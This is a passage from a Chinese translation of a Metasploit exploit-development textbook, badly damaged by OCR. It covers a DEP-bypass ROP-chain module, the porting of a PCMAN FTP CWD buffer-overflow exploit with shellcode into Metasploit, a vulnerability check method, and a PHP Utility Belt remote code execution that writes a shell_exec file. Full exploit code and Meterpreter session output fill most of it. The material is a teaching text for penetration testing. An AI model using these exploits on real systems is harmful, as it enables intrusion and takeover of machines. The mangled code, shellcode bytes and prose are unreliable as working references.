9999 端 口 ， 并且 存在 一 个 栈 溢出 漏洞 。 下 面 快 速 建立 一 个 模块 ， E CE 了 DEP 保 护 
的 程序 进行 渗透 : 


require 'msf/core' 


class Metasploit3 « Msf::Exploit::Remote 
Rank - NormalRanking 


include Msf::Exploit::Remote::Tcp 


def initialize(info - () 
super(update info(info, 
'Name' => 'DEP Bypass Exploit', 
'Description' => %q{ 
DEP Bypass Using ROP Chains Example Module 
Je 
'Platform' => 'win' 
'Author' I» 
[ 
'Nipun Jaswal' 
l], 
'Payload' => 
{ 


'space' => 312, 
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'BadChars' -z» "Ax00"', 
} 

'Targets' => 

[ 

['Windows 7 Home Basic',{ 'Offset' => 2006}] 

l, 

'DisclosureDate' -» 'Apr 29 2016' 
)) 
register options( 

[ 

Opt : :RPORT (9999) 


] ,self.class) 


我 们 已 经 编写 过 很 多 个 模块 ， 而 且 对 初始 化 部 分 和 所 需 的 库 文件 也 不 再 陌生 了 。 此 外 , 我 们 
也 不 再 需要 返回 地 址 , 因为 ROP 链 可 以 自动 构建 一 个 跳 转 到 ShellCode 的 机 制 。 下 面 来 看 看 实现 渗 
透 的 代码 : 


def create rop chain() 


# rop chain generated with mona.py - www.corelan.be 
rop gadgets - 

[ 
0x7722d479, 4 POP ECX # RETN [msvcrt.dll] 


0x6250609c, # ptr to &VirtualProtect() [IAT essfunc.dll] 
0x7648fd52, 4 MOV ESI,DWORD PTR DS:[ECX] # ADD DH,DH # RETN 
[MSCTF.dll 


0x77276de4, # POP EBP # RETN [msvcrt.dll] 


0x77492273, # & jmp esp [NSI.d11] 
0x77231834, # POP EAX # RETN [msvcrt.dll 
Oxfffffdff, # Value to negate, will become 0x00000201 
0x76d6f3a8, 4 NEG EAX # RETN [RPCRTA4.dll 
0Ox7648f9f1, # XCHG EAX,EBX # RETN [MSCTF.dl11l] 
0x77231834, # POP EAX # RETN [msvcrt.dll 
OxffffffcO, # Value to negate, will become 0x00000040 
0x765c4802, # NEG EAX # RETN [user32.d11l 
0x770cbd3a, # XCHG EAX,EDX # RETN [kernel32.dl11] 
0x77229111, # POP ECX # RETN [msvcrt.dll 
0x74ed741a, # &Writable location [mswsock.dl1] 
0x774b2963, # POP EDI # RETN [USP10.dl11 
0x765c4804, # RETN (ROP NOP) [user32.d11 
0x7723f5d4, # POP EAX # RETN [msvcrt.dll 

# 


0x90909090, nop 
0x774c848e, # PUSHAD # RETN [USP10.dll 
].flatten.pack("V*") 


return rop. gadgets 
end 
def exploit 
connect 
rop chain - create rop chain() 
junk = rand text alpha, upper(target['Offset']) 
buf = "TRUN ."«junk + rop chain + make nops(16) + 
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payload.encoded+'\r\n' 
sock.put (buf) 
handler 
disconnect 
end 
end 


我 们 从 rop_chains.txt 文 件 中 将 Mona 脚 本 产生 的 create_rop_chain 函 数 复制 到 渗透 代码 中 。 
这 段 渗透 代码 先 连接 到 目标 , 之 后 调用 create_rop_chain 国 数 , 并 将 完整 的 ROP 链 保存 到 


rob_chain 变 量 中 。 


接 下 来 , 我 们 使 用 rand_text_alpha_upper 困 数 创 建 了 一 个 包含 了 2006 个 随机 字符 的 字符 
串 ， 并 将 其 保存 在 一 个 名 为 junk 的 变量 中 。 这 个 应 用 程序 的 漏洞 依赖 于 TRUN 命 令 的 执行 。 因 此 ， 
创建 一 个 名 为 bpuf 的 新 变量 ， 并 将 命令 TRUN 与 包含 了 2006 个 随机 字符 的 junk 变 量 和 rop_chain 
保存 在 这 个 变量 中 。 最 后 ， 再 将 一 些 填充 数据 和 ShellCode 添 加 到 buf 变量 


接 下 来 ， 将 这 个 buf 变 量 放 入 通信 汇 道 sock .put 方 法 中 。 最 后 ， 调 用 handler 来 检查 这 次 渗 
透 是 否 成 功 。 


运行 这 个 模块 ， 检 查 能 否 成 功 渗透 该 系统 。 


msf exploit(example9999-1rop) > exploit I 


[*] Started bind handler 

[*] Sending stage (957487 bytes) to 192.168.10.105 

[*] Meterpreter session 1 opened (192.168.10.118:53655 -> 192.168.10.105:4444) a 
t 2016-04-15 02:26:21 -0400 


meterpreter » g 


Computer WIN-97G4SSDJD5S 

os : Windows 7 (Build 7600). 
Architecture : x86 

System Language : en US 

Domain : WORKGROUP 

Logged On Users : 2 

Meterpreter : x86/win32 


meterpreter » 


干 得 漂亮 ! 我 们 已 经 解决 了 DEP 保 护 机 制 ， 现 在 就 可 以 对 已 渗透 系统 进行 后 渗透 工作 了 。 


3.5 其 他 保护 机 制 


在 本 章 中 ， 我们 开发 了 基于 栈 漏洞 的 渗透 模块 。 在 开发 过 程 中 ， 还 绕 过 了 SEH 和 DEP 保 护 机 
制 。 目 前 常见 的 保护 技术 还 有 地 址 空间 布局 随机 化 ( Address Space Layout Randomization, ASLR )、 
栈 cookies、SafeSEH 、SEHOP 以 及 各 种 其 他 技术 , 我 们 将 在 本 书后 续 内 容 中 看 到 绕 过 这 些 保护 
机 制 的 方法 。 不 过 要 理解 这 些 方法 ， 需 要 在 汇编 、 操 作 码 和 调试 方面 有 很 良好 的 基础 。 
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这 是 一 个 优秀 的 保护 机 制 绕 过 教程 : https://www.corelan.be/index.Php/29/9/2 1/ 
人 exploit-writing-tutorial-part-6-bypassing-stack-cookies-safeseh-hw-dep-and-aslr/ 


如 果 想 获取 关于 调试 的 更 多 信息 ， 请 访问 http://resources.infosecinstitute.com/ 
debugging-fundamentals-for-exploit-development/。 


3.6 ”小结 


在 这 一 章 中 ， 我 们 介绍 了 在 Metasploit 中 编写 渗透 模块 的 汇编 基础 、 一 般 概 念 以 及 它们 在 渗 
透 中 的 重要 性 。 本 章 深 入 研究 了 基于 栈 的 溢出 漏洞 、 基 于 SEH 的 栈 溢出 以 及 如 何 绕 过 DEP 之 类 的 
保护 机 制 。 我 们 还 学 习 了 各 种 在 Metasploit 中 用 来 辅助 渗透 开发 的 工具 。 此 外 还 介绍 了 坏 字符 和 
空间 限制 的 重要 性 。 


现在 ， 我 们 已 经 可 以 完成 很 多 任务 了 ， 例 如 在 辅助 工具 的 帮助 下 使 用 Metasploit 来 编写 软件 
渗透 程序 ,使 用 调试 器 来 检查 重要 寄存 器 中 的 内 容 ,改写 寄存 器 中 内 容 的 方法 ,并 且 战 胜 了 复杂 
的 保护 机 制 。 


下 一 章 将 会 着 眼 于 那些 Metasploit 框 架 中 不 包括 的 但 却 已 经 公开 而 且 有 效 的 模块 。 我 们 将 把 
它们 移植 到 Metasploit 框 架 中 。 


渗透 模块 的 移植 


“黑客 并 不 是 想 要 破坏 什么 ， 而 是 希望 在 普 DECR TUDIN. 个 看 起 来 
很 了 不 起 的 家 伙 ， 所 以 其 他 人 完全 没 必 要 这 人 么 做 。 


Youssef Rebahi Gilbert， 网 络 安全 专家 


上 一 章 学 习 了 如 何在 Metasploit 中 编写 渗透 模块 。 不 过 ， 如 果 某 个 程序 已 经 有 相应 的 渗透 模 
R, 就 没有 必要 重新 编写 一 个 了 。 MEZ vade dd 能 是 用 不 同 语言 编写 的 , 例如 Perl、 
Python、C 等 。 下 面 开始 学 习 如 何 将 用 不 同 语言 编写 的 模块 移植 到 Metasploit 人 框架 中 。 通 过 这 种 机 
制 ， 可 以 将 各 种 现存 的 模块 软件 移植 成 为 与 Metasploit 裴 容 的 渗透 模块 ， 从 而 达到 节省 时 间 、 实 
现 攻击 载 位 动态 切换 的 效果 。 


本 章 将 着 眼 于 以 下 几 个 要 点 。 


a 将 使 用 不 同 语言 编写 的 模块 移植 到 Metasploit 中 。 
口 从 独立 的 渗透 模块 中 发 掘 出 功能 实现 的 要 点 。 
口 通过 现 有 的 扫描 或 者 工具 脚本 来 创建 Metasploit 模 块 。 


如 果 搞 清楚 了 现 有 模块 中 的 函数 都 执行 了 什么 任务 ， 那 么 将 该 模块 移植 到 Metasploit 框 架 中 
也 就 不 是 一 件 困 难 的 事情 了 。 


只 对 一 台 主 机 进行 渗透 测试 时 ， 将 一 个 独立 的 模块 移植 到 Metasploit 并 不 能 节省 渗透 攻击 的 
时 间 。 在 对 大 规模 的 网 络 进行 渗透 测试 的 时 候 才 能 体现 出 模块 移植 的 优势 。 另 外， 由 于 移植 后 的 
每 一 个 渗透 模块 都 属于 Metasploit， 这 使 得 渗透 测试 更 加 有 具 有 组 织 性 。 接 下 来 将 学 习 如 何 实 现 
Metasploit 的 可 移植 性 。 


4.1 导入 一 个 基于 栈 的 缓冲 区 溢出 渗透 模块 


在 接 下 来 的 示例 中 ,我 们 将 看 到 如 何 将 一 个 用 Python 编写 的 渗透 模块 导 人 到 Metasploit 中 。 
你 可 以 从 https://www.exploit-db.com/exploits/31255/ 下 载 这 个 渗透 模块 。 下 面 来 分 析 这 个 模块 
的 代码 。 
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import socket as s 
from sys import argv 


host - "127.0.0.1" 

fuser - "anonymous" 

fpass - "anonymous" 

junk e 'XAx4Al' * 2008 
espaddress = 'WNx72Nx93NxabNx71' 
nops - 'Nx90' * 10 


shellcode- ("\xba\x1lc\xb4\xa5\xac\xda\xda\xd9\x74\x24\xf4\x5b\x29\xc9\xb1" 
"NX33NX31NX53NX12Nx83NxebNx£cNx03Nx4£Nxba Nx47NxX59Nx93Nx2aNx0e" 
"Axa2Nx6bNxabNx71Nx2aNx8eNx9aNxa3Nx48NxdbNx8£Nx73Nx1aNx89Nx23" 
"\xff\x4e\x39\xb7\x8d\x46\x4e\x70\x3b\xbl\x61\x81\x8d\x7d\x2d" 
"\Xx41\x8f\x01\x2f\x96\x6f\x3b\xe0\xeb\x6e\x7c\xlc\x03\x22\xd5" 
"\x6b\xb6\xd3\x52\x29\x0b\xd5\xb4\x26\x33\xad\xbl\xf8\xc0\x07" 
"\xbb\x28\x78\x13\xf3\xd0\xf2\x7b\x24\xel\xd7\x9f\x18\xa8\x5c" 
"\x6b\xea\x2b\xb5\xa5\x13\xla\xf9\x6a\x2a\x93\xf4\x73\x6a\x13" 
"\xe7\x01\x80\x60\x9a\x11\x53\x1b\x40\x97\x46\xbb\x03\x0f\xa3" 
"\x3a\xc7\xd6\x20\x30\xac\x9d\x6f\x54\x33\x71\x04\x60\xb8\x74" 
"\xcb\xel\xfa\x52\xcf\xaa\x59\xfa\x56\x16\x0f\x03\x88\xfe\xf0" 
"\xal\xc2\xec\xe5\xd0\x88\x7a\xfb\x51\xb7\xc3\xfb\x69\xb8\x63" 
"\x94\x58\x33\xec\xe3\x64\x96\x49\xlb\x2f\xbb\xfb\xb4\xf6\x29" 
"\xbe\xd8\x08\x84\xfc\xe4\x8a\x2d\x7c\x13\x92\x47\x79\x5f\x14" 
"\xbb\xf3\xf0\xf1\xbb\xa0\xf1l\xd3\xdf\x27\x62\xbf\x31\xc2\x02" 
"\x5a\x4e") 


sploit = junk+espaddress+nops+shellcode 
conn = S.Socket(s.AF INET,s.SOCK STREAM) 
conn.connect ( (host,21)) 

conn.send('USER '+fuser+'\r\n') 

uf - conn.recv(1024) 

conn.send('PASS '+fpass+'\r\n') 

pf - conn.recv(1024) 

conn.send('CWD '+sploit+'\r\n') 

cf - conn.recv(1024) 

conn.close() 


个 渗透 模块 采用 匿名 方式 登录 到 运行 在 21 端 口上 的 PCMAN FTP 2.0， 并 利用 cwD 命 令 来 渗 


NU 


整个 渗透 过 程 可 以 分 解 为 如 下 几 点 。 

(1) 将 用 户 名 、 密 码 和 主机 分 别 保存 到 变量 fuser、pass 和 host 中 。 

(2) 为 变量 junk 赋 值 为 2008 个 字符 A。 这 里 EIP 的 偏 移 量 为 2008。 

(3) 将 JMPESP 的 地 址 赋值 给 变量 espaddqress, 目标 返回 地 址 为 espaadqress 的 值 0x71ab9372。 
(4) 将 10 个 NOP 保 存 到 变量 nops 中 。 

(5) 将 用 来 启动 计算 器 的 攻击 载荷 保存 到 变量 shellcode 中 。 
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(6) 将 junk、espaddress、nops 以 及 shellcode 连 接 起 来 并 保存 到 变量 sploit 中 。 


(7) 使 用 语句 s .socket (s .AF_INET,s .SOCK_STREAM) 建立 一 个 套 接 字 连接 ， 然 后 使 用 
connect ( (host, 21) ) 连 接 到 目标 的 21 端 口 。 


(8) 使 用 USER 命 令 加 变量 Euser，PASS 命 令 加 变量 fpass 成 功 登 录 到 目标 ftp 上 。 


(9) 向 目标 发 送 cwD 命 令 , 并 在 后 面 加 上 变量 sploit。 这 将 改写 在 偏 移 量 为 2008 处 的 EIP 中 的 
内 容 ， 并 弹出 一 个 计算 器 应 用 程序 。 


执行 该 渗透 模块 并 分 析 结果 ， 过 程 如 下 。 


E Pomars FTP Server [Onine] .13216810 10 m 


oof) OOW OOH) icrosoft Windows XP [Version 5.1.2600] 
«C» Copyright 1985-2001 Microsoft Corp. 


C:\Documents and SettingsMfüdministrator?cd Desktop 


C:\Documents and SettingsMfidministratorNDesktop?PCMAN-CUD.py 


QD 原来 的 渗透 模块 需要 从 命令 行 处 接收 用 户 名 、 密 码 和 主机 等 值 , 不 过 我 们 使 用 
固定 的 硬 编 码 值 修 改 了 这 个 参数 赋值 的 机 制 。 


渗透 模块 执行 之 后 ， 将 会 弹出 如 下 内 容 。 


c Command Prompt 


E Calculator | E3 <C) Copyright 1985-2801 Microsoft Corp. 


:NDocuments and SettingsMfldministrator?cd Desktop 


*NDocuments and Settings*Mfildministrator*Desktop»PCMAN-CUD.py 
raceback most recent call last): 


File "C:\Documents and SettingsMfüidministrator*DesktopNPCMAN-CUD.py", 
| Backspace Em E in «module» 
IN — ket.errort IErrao 104541 A forcibly closed 
ocket.error: rrno 100 n existing connection vas forcibly close 
DE 
m | | 4 5 | 6 Jl m || x | :\Documents and Settings\Administrator\Desktop> 
MS 1 2 3 - 1/8 
EN Ea E JEJE) 


可 以 看 到 ， 弹 出 了 一 个 计算 器 应 用 程序 ， 这 表明 了 渗透 模块 成 功 地 完成 了 任务 。 
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4.1.1 收集 关键 信息 


现在 来 从 这 个 渗透 模块 中 找 出 一 些 重要 的 值 ， 这 些 值 是 我 们 在 创建 相同 功能 的 Metasploit 模 
块 时 所 必需 的 ， 下 表 列 出 了 这 些 值 。 


序 号 变 量 值 
1 偏 移 量 2008 
2 目标 返回 / 跳 转 地 址 /使 用 JMP ESP 在 可 执行 0x71AB9372 
模块 中 找到 值 
3 目标 端口 21 
4 ShellCode 用 来 消除 不 确定 区 域 的 NOP 字 节 10 
思路 后 面 跟 着 2008 个 字 节 的 填充 数据 以 及 变量 espaddress、 


NOP 和 shellcode 值 的 cwD 命 令 


我 们 现在 已 经 获得 了 构建 Metasploit 模 块 所 需 的 全 部 信息 。 在 下 一 节 中 ， 我 们 将 会 看 到 使 用 
Metasploit 构 建 一 个 渗透 模块 是 多 么 轻松 的 一 件 事 ! 


4.1.2 ”构建 Metasploit 模块 


复制 一 个 相同 功能 的 模块 再 对 其 进行 改造 是 开始 构建 一 个 Metasploit 模 块 的 最 简单 方法 。 不 
过 Mona.py 脚 本 也 可 以 动态 生 RT 天 用 的 模块 ， 后 续 章 节 将 会 讲述 如 何 使 用 Mona.py 
脚本 来 快速 生成 一 个 渗透 模块 。 


现在 来 看 一 个 功能 相同 的 Metasploit 模 块 代码 : 


require 'msf/core' 


class Metasploit3 « Msf::Exploit::Remote 
Rank - NormalRanking 


include Msf::Exploit::Remote::Ftp 


def initialize(info - () 
super (update info(info, 
'Name' => 'PCMAN FTP Server Post-Exploitation CWD Command', 
'Description' => %q{ 
This module exploits a buffer overflow vulnerability in PCMAN FTP 
} 
'Author' =% 
[ 
'Nipun Jaswal' 
Iz 
'DefaultOptions' => 
{ 
'EXITFUNC' 
'VERBOSE' 


> 'process', 
> true 
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'Space' 
'BadChars' 
i 
'Platform' 
'Targets' 
[ 
[ 'Windows XP 
( 
'Ret' => 0x71ab9372, 
'Offset' => 2008 
j 
l], 
(i; 
'DisclosureDate' 
'DefaultTarget' 
register options( 


[ 


> 1000, 
» "AxOO0WNxffNxOaNxOGdNx20NxAO0", 


» 'win', 


SP2 English', 


'May 9 2016', 
0)) 


=> 
=> 


Opt: 
OptString.new( 
],self.class) 


:RPORT (21), 


'FTPPASS', [true, 'FTP Password', ]) 


'anonymous' 


End 


我 们 在 前 面 几 章 已 经 研究 过 很 多 渗透 模块 , 现在 这 个 渗透 模块 也 没什么 特殊 之 处 。 我 们 还 是 
先 引 入 了 所 有 必需 的 库 文件 和 /lib/msfycore/exploit 目 录 下 的 ftp.rb 库 文件 ， 再 在 初始 化 部 分 定义 了 
所 有 必需 的 信息 。 根 据 从 渗透 模块 中 收集 到 的 关键 信息 ， 我 们 将 Ret 的 值 设 置 为 返回 地 址 的 值 ， 
将 of fset 的 值 设置 为 2008, 男 外 还 将 FTPPASS 选 项 设置 为 'anonymous' 。 接 着 来 看 下 面 的 代码 : 


def exploit 
C = connect login 
return unless c 


sploit - rand text alpha(target['Offset']) 
sploit << [target.ret].pack('V') 
sploit << make nops(10) 
Sploit «« payload.encoded 
send cmd( ["CWD " + sploit, false] ) 
disconnect 

end 


end 


使 用 connect_login 方 法 连接 到 目标 ， 然后 使 用 我 们 提供 的 用 户 名 和 密码 尝 


试 登录 。 等 一 


下 ! 我 们 什么 时 候 提供 过 登录 的 用 户 名 和 密码 了 ? 在 导入 ftp 库 之 后 ， 


这 个 模块 中 的 FTPUSE 


ER 和 


FTPPASS 选 项 就 可 以 自动 完成 这 项 工作 。FTPUS 


ER 的 默认 值 为 anonymous。 


不 过 ， 我 们 已 经 在 


register_options 中 将 FTPPASS 的 值 设 置 成 anonymous 了。 


接 下 来 ， 使 用 ranq_text_alpha 国 数 牛 成 2008 个 e d Mead RU 
填充 数据 ， 并 将 它们 都 保存 到 变量 sploit 中 ; 使 用 pack('V' ) RAO Targets P Ret KIEL 
端 格式 保存 到 sploit 变 量 中 ; 再 将 make_nop 函 a E » 
后 ， 输 出 数据 就 准备 好 了 。 
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再 下 一 步 , 使 用 ftp 库 中 的 send_cma 函 数 将 一 个 包含 了 变量 sploit 中 数据 的 cwD 命 令 发 送 到 
目标 。 但 是 如 果 使 用 Metasploit 又 有 哪些 区 别 呢 ? 下 面 就 来 看 看 Metasploit 能 做 到 什么 。 


口 无 须 手 动 生 成 填充 数据 ， 这 一 工作 可 以 由 rand_text_alpha 困 数 完成 。 

O 无 须 将 Ret 地 址 转换 为 小 端 格 式 ， 这 一 工作 可 以 由 函数 pack ('V') 实现。 

口 无 须 手动 生成 NOP， 这 一 工作 可 以 由 make_nops 完 成 。 

a 无 须 提供 任何 硬 编码 的 ShellCode， 因 为 可 以 在 模块 运行 时 再 决定 或 者 改变 攻击 载荷 。 这 
样 在 需要 改变 ShellCode 时 就 无 须 重新 编码 ， 从 而 节省 了 大 量 时 间 。 

Q 轻松 地 使 用 ftp 库 完成 了 套 接 字 的 创建 和 连接 操作 。 

口 最 为 重要 的 是 ， 再 也 不 需要 手动 输入 命令 来 连接 和 登录 ， 为 Metasploit 的 方法 
connect_login 完 成 了 这 项 工作 。 


4.1.3 ”使 用 Metasploit 完成 对 目标 应 用 程序 的 渗透 


我 们 已 经 见识 到 了 使 用 Metasploit 改 造 现 有 渗透 模块 的 便利 性 ， 接 下 来 就 使 用 这 个 模块 来 渗 
透 目 标 应 用 程序 ， 并 对 结果 进行 分 析 。 


msf > use exploit/windows/masteringmetasploit/pcman cwd 
msf exploit(pcman cwd) » set RHOST 192.168.10.108 

RHOST -» 192.168.10.108 

msf exploit(pcman cwd) > show options 


I 
Module options (exploit/windows/masteringmetasploit/pcman cwd): 


Name Current Setting Required Description 

FTPPASS anonymous yes FTP Password 

FTPUSER anonymous no The username to authenticate as 
RHOST 192.168.10.108 yes The target address 

RPORT 21 yes The target port 


Exploit target: 


Id Name 


0 Windows XP SP2 English 


FTPPASS 和 FTPUSER 的 值 都 已 经 被 设置 成 为 了 anonymous 。 接 下 来 设置 RHosT 的 值 和 攻击 载 
荷 的 类 型 ， 并 开始 对 目标 计算 机 进行 渗透 攻击 。 过 程 如 下 图 所 示 。 


msf exploit(pcman cwd) > set payload windows/meterpreter/bind tcp 
payload => windows/meterpreter/bind tcp 
msf exploit(pcman cwd) > exploit 


| Started bind handler 

] Connecting to FTP server 192.168.10.108:21... 

] Connected to target FTP server. 

] Authenticating as anonymous with password anonymous... 
] Sending password... 

] Sending stage (957487 bytes) to 192.168.10.108 


meterpreter > 
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我 们 的 渗透 模块 成 功 完成 了 任务 。Metasploit 还 提供 了 一 些 额 外 的 功能 ， 可 以 使 渗透 过 程 更 
加 智能 化 ， 下 一 节 将 介绍 这 些 功能 。 


4.1.4 在 Metasploit 的 渗透 模块 中 实现 一 个 检查 (check) 方法 


在 对 目标 应 用 程序 进行 渗透 之 前 ，Metasploit 可 能 需要 检查 这 个 程序 的 版 本 。 这 一 点 十 分 重 
要 , 因为 如 果 运 行 在 目标 计算 机 上 的 应 用 程序 是 一 个 没有 漏洞 的 版 本 , 那么 渗透 过 程 就 可 能 引起 
目标 程序 的 崩 江 ,我们 的 渗透 也 就 成 了 泡影 。 现 在 来 编写 一 段 检 查 目 标 应 用 程序 的 代码 ( 在 上 一 
节 中 ,我 们 已 经 成 功 完 成 了 对 这 个 程序 的 渗透 ): 


def check 


C - connect login 


disconnect 


if c and banner =~ /220 PCMan's FTP Server 2N.0/ 
vprint status("Able to authenticate, and banner shows the vulnerable 


version") 


return Exploit::CheckCode::Appears 
elsif not c and banner =~ /220 PCMan's FTP Server 2N.0/ 
vprint status("Unable to authenticate, but banner shows the 


vulnerable version") 


return Exploit::CheckCode::Appears 


end 


return Exploit::CheckCode::Safe 


end 


checkJriEJé VH connect_login KAIRA, connect loginrPKZ& n] LA Foie 8 t5— 
个 到 目标 的 连接 。 如 果 连 接 成 功 , 应 用 程序 就 可 以 返回 一 个 banner。 使 用 正则 表达 式 将 这 个 banner 
与 漏洞 程序 的 banner 进 行 比 较 ， 如 果 成 功 连 接 并 且 banner 匹 配 的 话 ， 就 可 以 使 用 


Exploit::Checkcod 


: :Appears 将 这 个 应 用 程序 标记 为 存在 漏洞 ; 如 果 连 接 不 成 功 但 是 banner 


匹配 ， 则 表明 这 个 应 用 程序 也 是 存在 漏洞 的 ， 仍 然 将 这 个 应 用 程序 标记 为 
Exploit::Checkcode: 


:Appears， 表 示 存 在 漏洞 ; 如果 所 有 的 检查 都 不 成 功 ， 那 么 返回 一 个 


Exploit::CheckCode: 


: Safe 值 来 表明 这 个 应 用 程序 是 不 存在 漏洞 的 。 


现在 输入 check 命 令 看 看 这 个 应 用 程序 是 否 存 在 漏洞 。 


* 
B 
* 
* 
* 
* 


[*] 
[*] 
[*] 
[*] 
[*] 
I*1 


msf exploit(pcman cwd) > check 


Connecting to FTP server 192.168.10.108:21... 

Connected to target FTP server. 

Authenticating as anonymous with password anonymous... 
Sending password... 

Able to authenticate, and banner shows the vulnerable version 
192.168.10.108:21 - The target appears to be vulnerable. 


这 个 应 用 程序 是 存在 漏洞 的 ， 我 们 可 以 继续 渗透 。 


如 果 想 获取 关于 实现 check 方 法 的 更 多 细节 ,请 访问 https:/Wgithub.com/rapid7/ 
metasploit-framework/wiki/How-to-write-a-check90289629-method , 
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4.2 将 基于 Web 的 RCE 导入 Metasploit 


本 节 将 重点 讲解 如 何 将 Web 应 用 程序 渗透 模块 导入 到 Metasploit 中 。 本 章 将 着 眼 于 一 些 重要 函 
数 ,并 学 习 利 用 这 些 函 数 来 实现 那些 通过 其 他 编程 语言 实现 的 功能 。 在 这 个 示例 中 , 我 们 将 着 眼 
于 PHP utility belt 远 程 代码 执行 漏洞 ， 这 个 漏洞 发 现 于 2015 年 12 月 8 日 。 你 可 以 从 以 下 网 址 下 载 这 
个 存在 漏洞 的 应 用 程序 : https//www.exploit-db.com/apps/222c6e2ed4c86f64616e43d1947a1f-php- 
utility-belt-master.zip。 


这 个 远程 代码 执行 漏洞 通过 一 个 PosT 请 求 的 代码 参数 触发 ， 服 务 器 在 接收 到 这 段 精 心 构造 的 数 
据 请 求 并 对 其 进行 处 理 之 时 就 会 执行 服务 器 端 代码 。 现 在 来 看 看 如 何 对 这 个 漏洞 进行 手动 渗透 。 


Utility Belt Home Passwords Regular Expressions Date & Time Printf 


PHP goes here 


fwrite(fopen('info.php','w'),' <?php $a = "net user"; echo shell exec($a);?»"); 


上 图 中 使 用 的 命令 是 fwrite， 这 条 命令 是 用 来 向 文件 写 数据 的 。 使 用 fwrite 以 可 写 模式 打 
开 名 为 info.php 的 文件 ， 然 后 将 <?php $a = "net user"; echo shell exec($a);?» 8 Af] 
文件 中 。 

命令 执行 之 后 ， 将 会 创建 一 个 名 为 info php 的 新 文件 ， 并 将 PHP 中 的 信息 写 人 到 这 个 文件 中 。 
接 下 来 ， 只 需 浏览 imnfo.php 文 件 ， 就 可 以 看 到 执行 命令 的 结果 。 


在 浏览 器 中 打开 info.php， 如 下 所 示 。 


localhost 


User accounts for NDESKTOP-PESQ2IS - 
Administrator Apex DefaultAccount Guest 
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可 以 看 到 ， 在 info.php 页 面 中 列 出 了 所 有 的 用 户 名 。 为 了 编写 
程 代码 执行 漏洞 的 Metasploit 模 块 ， 需 要 构造 到 这 个 页 面 的 GET/PosT 请 求 ， 这 样 才能 将 我 们 构造 
意 数据 发 送 到 存在 漏洞 的 服务 器 上 ， 从 而 获得 日 标的 Meterpreter 权 限 。 


的 恶 ; 


4.2.1 收集 关键 信息 


个 可 以 渗透 PHP utility belt 远 


在 用 Metasploit 开 发 基于 Web 的 渗透 程序 时 ,最 重要 的 就 是 要 和 弄 清 楚 相关 的 Web 函 数 、 使 用 这 
些 函数 的 方法 以 及 这 些 函 数 的 参数 。 还 有 一 点 也 十 分 重要 , 就 是 要 知道 漏洞 的 确切 位 置 一 一 该 示 


例 中 的 漏洞 所 在 位 置 是 coDE 参 


4.2.2 ”掌握 重要 的 Web 函数 


Web 应 用 程序 使 用 的 重要 函数 都 可 以 在 /lib/msfrcore/exploits/http 下 的 clientrb 库 文件 中 找到 。 
另外 , 在 /libmex/proto/http 下 的 clientrb 文 件 和 client-requestrb 文 件 包 含 着 关于 GET 和 POST 请 求 的 核 


心 变量 和 方法 。 


库 文件 /lib/msf/core/exploit/http/client.rb 中 的 以 下 方法 可 以 用 来 创建 HTTP 请 求 。 


Q JE E dt E 


# Passes +opts+ through directly to Rex: :Proto::Http::Client#request_raw. 


def send request raw(opts-(], 
f datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0 
actual timeout = datastore['HttpClientTimeout'] 


actual timeout =  opts[:timeout] || timeout 


c = connect (opts) 

r = c.request_raw (opts) 

c.send recv(r, actual timeout) 
e ::Errno::EPIPE, 


Connects to the server, creates a request, 
reads the response 


Passes +opts+ through directly to Rex::Proto::Http::Clientiirequest cgi. 


ef send request cgi(opts-(], 
if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0 
actual timeout = datastore['HttpClientTimeout'] 


actual timeout =  opts[:timeout] || timeout 


c = connect(opts) 

r = c.request cgi(opts) 
c.send recv(r, actual timeout) 
:Errno::EPIPE, 


timeout = 20) 


: :Timeout: :Error 


sends the request, 


timeout = 20) 


:Timeout: :Error 
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当 我 们 发 送 一 个 基于 HTTP 的 请 求 时 ，senq_redquest_raw 和 senaq_readuest_cgi 方 法 是 相 
似 的 ， 但 是 应 用 于 不 同 的 情况 。 


sendq_reauest_cgi 与 使 用 传统 的 sena_request_raw 相 比 , 灵活 性 更 佳 。 而 在 另外 一 些 情 
况 下 ，send_request_raw 使 得 连接 更 简单 ， 接 下 来 我 们 将 学 习 它 们 。 


如 果 想 知道 都 需要 将 哪些 值 传 递 给 这 些 函 数 , 就 需要 对 REX 中 的 库 文件 进行 研究 。 REX 库 文 
件 提 供 了 与 请 求 类 型 相关 的 下 列 头 文件 ， 如 下 图 所 示 。 


# 

# Regular HTTP stuff 

# 

'agent' z» DefaultUserAgent, 
'cgi' z» true, 
'cookie' z» nil, 
'data' s» tt, 
'headers' z» nil, 
'raw headers' m» *'* 
'method' => 'GET', 
'path info' x» '', 
'port' => 80, 
'proto' z» 'HTTP', 
'query' => 75, 
'ssl' => fale, 
'uri' z» '/', 
'vars get' => {}, 
'vars_post' => {}, 
'version' z» 'l.l', 
'vhost' z» nil, 


在 这 里 可 以 看 到 ， 我 们 能 够 通过 前 面 的 参数 来 向 我 们 的 请 求 传递 大 量 的 参数 值 ， 比 如 说 你 
可 以 设 定 自己 指定 的 cookie 以 及 各 种 其 他 事情 。 这 里 我 们 力求 将 问题 简单 化 , 所 以 把 精力 都 放 在 
uri 参 数 上 ， 这 个 参数 是 进行 渗透 目标 网 页 文件 的 路 径 。 


我 们 使 用 参数 method 来 指明 这 是 一 个 GET， 还 是 一 个 PosT 类 型 的 请 求 ， 这 在 获取 目标 数据 
或 者 向 目标 传递 数据 时 可 以 使 用 。 


4.2.3 ”GET/POST 方法 的 使 用 要 点 


GET 方 法 用 于 在 浏览 网 页 时 向 指定 资源 发 送 对 数据 或 者 页 面 内 容 的 请 求 , 而 PosT 方 传递 页 面 
表格 中 的 数据 以 进行 进一步 的 处 理 。 现 在 ， 有 了 HTTP 库 ， 在 编写 基于 Web 的 渗透 模块 时 就 得 心 
应 手 多 了 。 使 用 PosT 类 型 的 请 求 使 得 向 指定 网 页 发 布 查询 或 者 数据 变 得 十 分 容易 。 


现在 来 看 看 在 这 个 渗透 模块 中 需要 执行 哪些 操作 。 
(1) 创建 一 个 PosT 请 求 。 


(2) 利用 coDE 参 数 将 攻击 载荷 发 送 到 有 漏洞 的 应 用 程序 中 。 
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(3) 获得 到 达 目 标的 Meterpreter 权 限 。 
(4) 完成 一 些 后 渗透 功能 。 


现在 我 们 已 经 对 需要 完成 的 任务 有 了 足够 的 了 解 , 接 下 来 将 编写 一 个 实现 上 述 功 能 的 渗透 模 
块 ， 并 确认 它 可 正常 运行 。 


4.2.4 将 HTTP 渗透 模块 导入 到 Metasploit 中 


